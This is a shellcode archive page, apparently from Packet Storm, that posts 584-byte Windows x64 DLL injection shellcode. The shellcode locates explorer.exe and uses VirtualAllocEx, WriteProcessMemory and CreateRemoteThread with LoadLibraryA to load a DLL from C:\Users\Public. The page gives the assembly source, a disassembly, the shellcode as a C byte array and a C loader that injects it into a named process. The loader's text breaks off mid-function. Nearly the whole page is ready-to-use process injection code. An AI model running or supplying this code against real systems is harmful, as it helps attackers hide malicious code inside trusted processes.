exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Windows x64 CreateRemoteThread() DLL Injection Shellcode

Windows x64 CreateRemoteThread() DLL Injection Shellcode
Posted Jan 15, 2017
Authored by Roziul Hasan Khan Shifat

584 bytes small Windows x64 CreateRemoteThread() DLL injection shellcode.

tags | shellcode
systems | windows
SHA-256 | a8a59b8091f3030bf184a00592e4b7185739e63499eee6346fec8c4637098469

Windows x64 CreateRemoteThread() DLL Injection Shellcode

Change Mirror Download
/*

Title: Windows x64 dll injection shellcode (using CreateRemoteThread())
Size: 584 bytes
Date: 16-01-2017
Author: Roziul Hasan Khan Shifat
Tested On : Windows 7 x64






*/



//Note : i wrtie it for process injection
//It may work in exploit



/*

section .text
global _start
_start:
xor r8,r8
push r8
push r8

mov [rsp],dword 'expl'
mov [rsp+4],dword 'orer'
mov [rsp+8],dword '.exe'

lea rcx,[rsp] ;;process name (explorer.exe) change it if U want


push r8
push r8
push r8



mov [rsp],dword 'C:\U'
mov [rsp+4],dword 'sers'
mov [rsp+8],dword '\Pub'
mov [rsp+12],dword 'lic\'
mov [rsp+16],dword 'in.d'
mov [rsp+20],word 'll'

lea rdx,[rsp] ;path of the dll (change it to U full path of dll)




;--------------------------------------------------------

mov r8w,336

sub rsp,r8
lea r12,[rsp]

push 24
pop r8 ;(important: length of dll path string including null byte)


mov [r12],rcx ;process name
mov [r12+8],rdx ;dll path
mov [r12+16],r8 ;length of dll path string

;----------------------------------------------------------





_main:

cdq
mov rax,[gs:rdx+0x60] ;peb
mov rax,[rax+0x18] ;peb->Ldr
mov rsi,[rax+0x10] ;peb->Ldr.InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;rdi=kernel32.dll base address



;------------------------------------------
mov dl,0x88
mov ebx,[rdi+0x3c] ;DOS_HEADER->elf_anew
add rbx,rdi ;IMAGE_OPTIONAL_HEADER32
mov ebx,[rbx+rdx] ;IMAGE_DATA_DIRECTORY->VirtualAddress
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY (Export table of kernel32.dll)

mov esi,[rbx+0x1c] ;kenrel32.dll AddressOfFunction
add rsi,rdi

;-------------------------------------------------------
;loading msvcrt.dll
cdq
push rdx
mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,rdi


mov [rsp],dword 'msvc'
mov [rsp+4],word 'rt'

lea rcx,[rsp]

sub rsp,88

call rbx

;-------------------------------
;Finding address of strcmp()

lea rdx,[rsp+88]
mov [rdx],dword 'strc'
mov [rdx+4],word 'mp'

mov rcx,rax

mov r8w,587*4
mov ebx,[rsi+r8]
add rbx,rdi

call rbx
;-----------------------------
mov [r12+24],rax ;address of strcmp()
;---------------------------------------------------------------

mov dx,190*4
mov ebx,[rsi+rdx]
add rbx,rdi ;CreateToolhelp32Snapshot()

;--------------------------------

;HANDLE WINAPI CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
xor rdx,rdx ;DWORD th32ProcessID
push 2
pop rcx ;DWORD dwFlags
call rbx

mov r13,rax ;HANDLE
cmp r13,-1
je __exit
;---------------------------------------------
mov dx,304

mov [r12+32],dword edx ;sizeof PROCESSENTRY32



mov dx,920*4
mov ebx,[rsi+rdx]
add rbx,rdi ;rbx=Process32First()

;WINBOOL WINAPI Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);

lea rdx,[r12+32] ;LPPROCESSENTRY32 lppe
mov rcx,r13 ;HANDLE hSnapshot


call rbx

cmp rax,1
jne __exit

;---------------------------------------------------

xor rdx,rdx
mov dx,922*4
mov r15d,[rsi+rdx]
add r15,rdi ;r15=Process32Next()



sub rsp,88
get_pid:
lea rcx,[r12+76] ;PROCESSENRY32.CHAR szExeFile[MAX_PATH=260]
mov rdx,[r12] ;process name
mov rbx,[r12+24] ;strcmp()
call rbx

xor rdx,rdx
cmp rax,rdx
jz inject

;WINBOOL WINAPI Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
mov rcx,r13
lea rdx,[r12+32]
call r15

cmp rax,1
je get_pid

leave
ret










__exit:
xor rdx,rdx
push rdx
mov dx,297*4
mov ebx,[rsi+rdx]
add rbx,rdi

pop rcx
call rbx










;--------------------------------------------------
;------------------------------------------------------
;inject function
inject:

xor rdx,rdx
push rdx
pop r10

mov r10w,899*4
mov ebx,[rsi+r10]
add rbx,rdi ;rbx=OpenProcess()

;WINBASEAPI HANDLE WINAPI OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId)

push rdx
pop rcx

mov r8d,[r12+40] ;PROCESSENTRY32.DWORD th32ProcessID

;0x1e84800a-0x1e65700b=2035711 (PROCESS_ALL_ACCESS)

mov ecx,0x1e84800a
sub ecx,0x1e65700b

call rbx

mov r13,rax ;PROCESS HANDLE
cmp r13,-1
je __exit
;--------------------------------------------------------------------

mov dx,1279
mov ebx,[rsi+rdx*4]
add rbx,rdi ;VirualAlloc()

;WINBASEAPI LPVOID WINAPI VirtualAllocEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
sub rsp,88

mov rcx,r13 ;HANDLE hProcess
xor rdx,rdx ;LPVOID lpAddress
mov r8,[r12+16] ;SIZE_T dwSize
mov r9w,0x2fff
inc r9;DWORD flAllocationType = (MEM_COMMIT | MEM_RESERVE)
mov [rsp+32],byte 0x4 ;DWORD flProtect = PAGE_READWRITE
call rbx

mov r14,rax ;LPVOID address
xor rdx,rdx
cmp rax,rdx
jz __exit


;-----------------------------------------------------------------------------------
mov dx,1347
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WriteProcessMemory()
sub rsp,88
xor rdx,rdx
;WINBASEAPI WINBOOL WINAPI WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
mov [rsp+32],rdx ;SIZE_T *lpNumberOfBytesWritten
mov rcx,r13 ;HANDLE hProcess
mov rdx,r14 ;LPVOID lpBaseAddress
mov r8,[r12+8] ;LPCVOID lpBuffer
mov r9,[r12+16] ;SIZE_T nSize

call rbx



cmp rax,1
jne __exit

;------------------------------------------------------------------------------------
mov dx,170*4
mov ebx,[rsi+rdx]
add rbx,rdi ;CreateRemoteThread()

xor rdx,rdx
sub rsp,88
;WINBASEAPI HANDLE WINAPI CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)

mov rcx,r13 ;HANDLE hProcess
push rdx
push rdx
pop r8 ;SIZE_T dwStackSize

mov dx,832
mov r9d,[rsi+rdx*4]
add r9,rdi ;LPTHREAD_START_ROUTINE lpStartAddress (LoadLibraryA())

pop rdx ;LPSECURITY_ATTRIBUTES lpThreadAttributes
mov [rsp+32],r14 ;LPVOID lpParameter
mov [rsp+40],r8
mov [rsp+48],r8
call rbx

call __exit

;------------------------------------------------------------























*/



/*



dll_inj.obj: file format pe-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
0: 4d 31 c0 xor %r8,%r8
3: 41 50 push %r8
5: 41 50 push %r8
7: c7 04 24 65 78 70 6c movl $0x6c707865,(%rsp)
e: c7 44 24 04 6f 72 65 movl $0x7265726f,0x4(%rsp)
15: 72
16: c7 44 24 08 2e 65 78 movl $0x6578652e,0x8(%rsp)
1d: 65
1e: 48 8d 0c 24 lea (%rsp),%rcx
22: 41 50 push %r8
24: 41 50 push %r8
26: 41 50 push %r8
28: c7 04 24 43 3a 5c 55 movl $0x555c3a43,(%rsp)
2f: c7 44 24 04 73 65 72 movl $0x73726573,0x4(%rsp)
36: 73
37: c7 44 24 08 5c 50 75 movl $0x6275505c,0x8(%rsp)
3e: 62
3f: c7 44 24 0c 6c 69 63 movl $0x5c63696c,0xc(%rsp)
46: 5c
47: c7 44 24 10 69 6e 2e movl $0x642e6e69,0x10(%rsp)
4e: 64
4f: 66 c7 44 24 14 6c 6c movw $0x6c6c,0x14(%rsp)
56: 48 8d 14 24 lea (%rsp),%rdx
5a: 66 41 b8 50 01 mov $0x150,%r8w
5f: 4c 29 c4 sub %r8,%rsp
62: 4c 8d 24 24 lea (%rsp),%r12
66: 6a 18 pushq $0x18
68: 41 58 pop %r8
6a: 49 89 0c 24 mov %rcx,(%r12)
6e: 49 89 54 24 08 mov %rdx,0x8(%r12)
73: 4d 89 44 24 10 mov %r8,0x10(%r12)

0000000000000078 <_main>:
78: 99 cltd
79: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
7e: 48 8b 40 18 mov 0x18(%rax),%rax
82: 48 8b 70 10 mov 0x10(%rax),%rsi
86: 48 ad lods %ds:(%rsi),%rax
88: 48 8b 30 mov (%rax),%rsi
8b: 48 8b 7e 30 mov 0x30(%rsi),%rdi
8f: b2 88 mov $0x88,%dl
91: 8b 5f 3c mov 0x3c(%rdi),%ebx
94: 48 01 fb add %rdi,%rbx
97: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
9a: 48 01 fb add %rdi,%rbx
9d: 8b 73 1c mov 0x1c(%rbx),%esi
a0: 48 01 fe add %rdi,%rsi
a3: 99 cltd
a4: 52 push %rdx
a5: 66 ba 40 03 mov $0x340,%dx
a9: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
ac: 48 01 fb add %rdi,%rbx
af: c7 04 24 6d 73 76 63 movl $0x6376736d,(%rsp)
b6: 66 c7 44 24 04 72 74 movw $0x7472,0x4(%rsp)
bd: 48 8d 0c 24 lea (%rsp),%rcx
c1: 48 83 ec 58 sub $0x58,%rsp
c5: ff d3 callq *%rbx
c7: 48 8d 54 24 58 lea 0x58(%rsp),%rdx
cc: c7 02 73 74 72 63 movl $0x63727473,(%rdx)
d2: 66 c7 42 04 6d 70 movw $0x706d,0x4(%rdx)
d8: 48 89 c1 mov %rax,%rcx
db: 66 41 b8 2c 09 mov $0x92c,%r8w
e0: 42 8b 1c 06 mov (%rsi,%r8,1),%ebx
e4: 48 01 fb add %rdi,%rbx
e7: ff d3 callq *%rbx
e9: 49 89 44 24 18 mov %rax,0x18(%r12)
ee: 66 ba f8 02 mov $0x2f8,%dx
f2: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
f5: 48 01 fb add %rdi,%rbx
f8: 48 31 d2 xor %rdx,%rdx
fb: 6a 02 pushq $0x2
fd: 59 pop %rcx
fe: ff d3 callq *%rbx
100: 49 89 c5 mov %rax,%r13
103: 49 83 fd ff cmp $0xffffffffffffffff,%r13
107: 74 60 je 169 <__exit>
109: 66 ba 30 01 mov $0x130,%dx
10d: 41 89 54 24 20 mov %edx,0x20(%r12)
112: 66 ba 60 0e mov $0xe60,%dx
116: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
119: 48 01 fb add %rdi,%rbx
11c: 49 8d 54 24 20 lea 0x20(%r12),%rdx
121: 4c 89 e9 mov %r13,%rcx
124: ff d3 callq *%rbx
126: 48 83 f8 01 cmp $0x1,%rax
12a: 75 3d jne 169 <__exit>
12c: 48 31 d2 xor %rdx,%rdx
12f: 66 ba 68 0e mov $0xe68,%dx
133: 44 8b 3c 16 mov (%rsi,%rdx,1),%r15d
137: 49 01 ff add %rdi,%r15
13a: 48 83 ec 58 sub $0x58,%rsp

000000000000013e <get_pid>:
13e: 49 8d 4c 24 4c lea 0x4c(%r12),%rcx
143: 49 8b 14 24 mov (%r12),%rdx
147: 49 8b 5c 24 18 mov 0x18(%r12),%rbx
14c: ff d3 callq *%rbx
14e: 48 31 d2 xor %rdx,%rdx
151: 48 39 d0 cmp %rdx,%rax
154: 74 24 je 17a <inject>
156: 4c 89 e9 mov %r13,%rcx
159: 49 8d 54 24 20 lea 0x20(%r12),%rdx
15e: 41 ff d7 callq *%r15
161: 48 83 f8 01 cmp $0x1,%rax
165: 74 d7 je 13e <get_pid>
167: c9 leaveq
168: c3 retq

0000000000000169 <__exit>:
169: 48 31 d2 xor %rdx,%rdx
16c: 52 push %rdx
16d: 66 ba a4 04 mov $0x4a4,%dx
171: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
174: 48 01 fb add %rdi,%rbx
177: 59 pop %rcx
178: ff d3 callq *%rbx

000000000000017a <inject>:
17a: 48 31 d2 xor %rdx,%rdx
17d: 52 push %rdx
17e: 41 5a pop %r10
180: 66 41 ba 0c 0e mov $0xe0c,%r10w
185: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
189: 48 01 fb add %rdi,%rbx
18c: 52 push %rdx
18d: 59 pop %rcx
18e: 45 8b 44 24 28 mov 0x28(%r12),%r8d
193: b9 0a 80 84 1e mov $0x1e84800a,%ecx
198: 81 e9 0b 70 65 1e sub $0x1e65700b,%ecx
19e: ff d3 callq *%rbx
1a0: 49 89 c5 mov %rax,%r13
1a3: 49 83 fd ff cmp $0xffffffffffffffff,%r13
1a7: 74 c0 je 169 <__exit>
1a9: 66 ba ff 04 mov $0x4ff,%dx
1ad: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
1b0: 48 01 fb add %rdi,%rbx
1b3: 48 83 ec 58 sub $0x58,%rsp
1b7: 4c 89 e9 mov %r13,%rcx
1ba: 48 31 d2 xor %rdx,%rdx
1bd: 4d 8b 44 24 10 mov 0x10(%r12),%r8
1c2: 66 41 b9 ff 2f mov $0x2fff,%r9w
1c7: 49 ff c1 inc %r9
1ca: c6 44 24 20 04 movb $0x4,0x20(%rsp)
1cf: ff d3 callq *%rbx
1d1: 49 89 c6 mov %rax,%r14
1d4: 48 31 d2 xor %rdx,%rdx
1d7: 48 39 d0 cmp %rdx,%rax
1da: 74 8d je 169 <__exit>
1dc: 66 ba 43 05 mov $0x543,%dx
1e0: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
1e3: 48 01 fb add %rdi,%rbx
1e6: 48 83 ec 58 sub $0x58,%rsp
1ea: 48 31 d2 xor %rdx,%rdx
1ed: 48 89 54 24 20 mov %rdx,0x20(%rsp)
1f2: 4c 89 e9 mov %r13,%rcx
1f5: 4c 89 f2 mov %r14,%rdx
1f8: 4d 8b 44 24 08 mov 0x8(%r12),%r8
1fd: 4d 8b 4c 24 10 mov 0x10(%r12),%r9
202: ff d3 callq *%rbx
204: 48 83 f8 01 cmp $0x1,%rax
208: 0f 85 5b ff ff ff jne 169 <__exit>
20e: 66 ba a8 02 mov $0x2a8,%dx
212: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
215: 48 01 fb add %rdi,%rbx
218: 48 31 d2 xor %rdx,%rdx
21b: 48 83 ec 58 sub $0x58,%rsp
21f: 4c 89 e9 mov %r13,%rcx
222: 52 push %rdx
223: 52 push %rdx
224: 41 58 pop %r8
226: 66 ba 40 03 mov $0x340,%dx
22a: 44 8b 0c 96 mov (%rsi,%rdx,4),%r9d
22e: 49 01 f9 add %rdi,%r9
231: 5a pop %rdx
232: 4c 89 74 24 20 mov %r14,0x20(%rsp)
237: 4c 89 44 24 28 mov %r8,0x28(%rsp)
23c: 4c 89 44 24 30 mov %r8,0x30(%rsp)
241: ff d3 callq *%rbx
243: e8 21 ff ff ff callq 169 <__exit>

















*/
























#include<stdio.h>
#include<windows.h>
#include<TlHelp32.h>
#include<string.h>


char shellcode[]="\x4d\x31\xc0\x41\x50\x41\x50\xc7\x04\x24\x65\x78\x70\x6c\xc7\x44\x24\x04\x6f\x72\x65\x72\xc7\x44\x24\x08\x2e\x65\x78\x65\x48\x8d\x0c\x24\x41\x50\x41\x50\x41\x50\xc7\x04\x24\x43\x3a\x5c\x55\xc7\x44\x24\x04\x73\x65\x72\x73\xc7\x44\x24\x08\x5c\x50\x75\x62\xc7\x44\x24\x0c\x6c\x69\x63\x5c\xc7\x44\x24\x10\x69\x6e\x2e\x64\x66\xc7\x44\x24\x14\x6c\x6c\x48\x8d\x14\x24\x66\x41\xb8\x50\x01\x4c\x29\xc4\x4c\x8d\x24\x24\x6a\x18\x41\x58\x49\x89\x0c\x24\x49\x89\x54\x24\x08\x4d\x89\x44\x24\x10\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x52\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\xc7\x04\x24\x6d\x73\x76\x63\x66\xc7\x44\x24\x04\x72\x74\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x8d\x54\x24\x58\xc7\x02\x73\x74\x72\x63\x66\xc7\x42\x04\x6d\x70\x48\x89\xc1\x66\x41\xb8\x2c\x09\x42\x8b\x1c\x06\x48\x01\xfb\xff\xd3\x49\x89\x44\x24\x18\x66\xba\xf8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x6a\x02\x59\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\x60\x66\xba\x30\x01\x41\x89\x54\x24\x20\x66\xba\x60\x0e\x8b\x1c\x16\x48\x01\xfb\x49\x8d\x54\x24\x20\x4c\x89\xe9\xff\xd3\x48\x83\xf8\x01\x75\x3d\x48\x31\xd2\x66\xba\x68\x0e\x44\x8b\x3c\x16\x49\x01\xff\x48\x83\xec\x58\x49\x8d\x4c\x24\x4c\x49\x8b\x14\x24\x49\x8b\x5c\x24\x18\xff\xd3\x48\x31\xd2\x48\x39\xd0\x74\x24\x4c\x89\xe9\x49\x8d\x54\x24\x20\x41\xff\xd7\x48\x83\xf8\x01\x74\xd7\xc9\xc3\x48\x31\xd2\x52\x66\xba\xa4\x04\x8b\x1c\x16\x48\x01\xfb\x59\xff\xd3\x48\x31\xd2\x52\x41\x5a\x66\x41\xba\x0c\x0e\x42\x8b\x1c\x16\x48\x01\xfb\x52\x59\x45\x8b\x44\x24\x28\xb9\x0a\x80\x84\x1e\x81\xe9\x0b\x70\x65\x1e\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\xc0\x66\xba\xff\x04\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x4c\x89\xe9\x48\x31\xd2\x4d\x8b\x44\x24\x10\x66\x41\xb9\xff\x2f\x49\xff\xc1\xc6\x44\x24\x20\x04\xff\xd3\x49\x89\xc6\x48\x31\xd2\x48\x39\xd0\x74\x8d\x66\xba\x43\x05\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x48\x31\xd2\x48\x89\x54\x24\x20\x4c\x89\xe9\x4c\x89\xf2\x4d\x8b\x44\x24\x08\x4d\x8b\x4c\x24\x10\xff\xd3\x48\x83\xf8\x01\x0f\x85\x5b\xff\xff\xff\x66\xba\xa8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x48\x83\xec\x58\x4c\x89\xe9\x52\x52\x41\x58\x66\xba\x40\x03\x44\x8b\x0c\x96\x49\x01\xf9\x5a\x4c\x89\x74\x24\x20\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\xff\xd3\xe8\x21\xff\xff\xff";


void inject(DWORD );
int main(int i,char *a[])
{
if(i!=2)
{
printf("Usage %s <program name>",a[0]);
return 0;
}

BOOL f=0;
HANDLE snap;
PROCESSENTRY32 pe32;

snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

if(snap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot() Failed."); return 0;
}

pe32.dwSize=sizeof(pe32);

if(!Process32First(snap,&pe32))
{
printf("Process32First() Failed."); return 0;
}



do
{
if(0==strncmp(a[1],pe32.szExeFile,strlen(pe32.szExeFile)))
{
f=TRUE;
break;
}

}while(Process32Next(snap,&pe32));


if(!f)
{
printf("No infomation found about \"%s\" ",a[1]);
}
else
{
printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID);
printf("\nInjecting shellcode");
inject(pe32.th32ProcessID);
}



return 0;

}



void inject(DWORD pid)
{
HANDLE phd,h;
LPVOID shell;

phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);

if(phd==INVALID_HANDLE_VALUE)
{
printf("\nOpenProcess() Failed."); return ;
}

shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(shell==NULL)
{
printf("\nVirtualAllocEx() Failed"); return ; CloseHandle(phd);
}

WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
printf("\nInjection successfull\n");
printf("Running Shellcode......\n");

h=CreateRemoteThread(phd,NULL,2046,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
if(h==NULL)
{
printf("Failed to Run Shellcode\n"); return ;
}

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    14 Files
  • 30
    Sep 30th
    19 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close